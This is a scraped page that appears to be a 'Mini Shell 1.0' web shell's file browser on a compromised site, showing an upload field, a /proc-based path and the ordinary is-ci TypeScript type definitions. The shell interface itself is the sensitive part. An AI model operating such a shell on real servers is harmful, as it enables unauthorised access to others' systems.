HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991109/root/usr/share/nodejs/@types/is-ci/
Upload File :
Current File : //proc/1991109/root/usr/share/nodejs/@types/is-ci/index.d.ts
// Type definitions for is-ci 3.0
// Project: https://github.com/watson/is-ci
// Definitions by: Arne Schubert <https://github.com/atd-schubert>,
//                 Florian Imdahl <https://github.com/ffflorian>
// Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped

import { isCI } from 'ci-info';

export = isCI;